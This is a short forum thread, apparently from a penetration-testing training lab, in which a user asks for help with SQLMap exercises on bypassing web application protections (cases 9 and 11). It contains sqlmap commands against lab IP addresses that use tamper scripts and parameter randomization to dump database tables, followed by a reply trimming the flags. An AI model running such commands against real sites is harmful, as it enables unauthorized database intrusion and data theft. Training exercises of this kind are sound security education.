SQLMap - Bypassing Web Application Protections - case 9 and case 11

Hi there, I am seeking help/assistance on the bypassing Web Application Protections - case 9 and case 11?

I am using or trying case 9
sqlmap -u “http://206.189.114.209:30142/case9.php?id=1*&uid=1842984375” --randomize=uid --batch -v 5 --tables --dump | grep URI

case 11, I tried a bunch of others, all of them doesnt seem to work.
sqlmap -u “http://165.227.225.180:32243/case11.php” --data=‘id=1’ --tamper=apostrophemask,greater --batch --tables

Thank you…

I haven’t finished 11 yet, but I can tell you that you have too many switches for case 9. You don’t need the pipe grep URI or v 5 --tables. I hope that helps. Oh, and put dump before batch.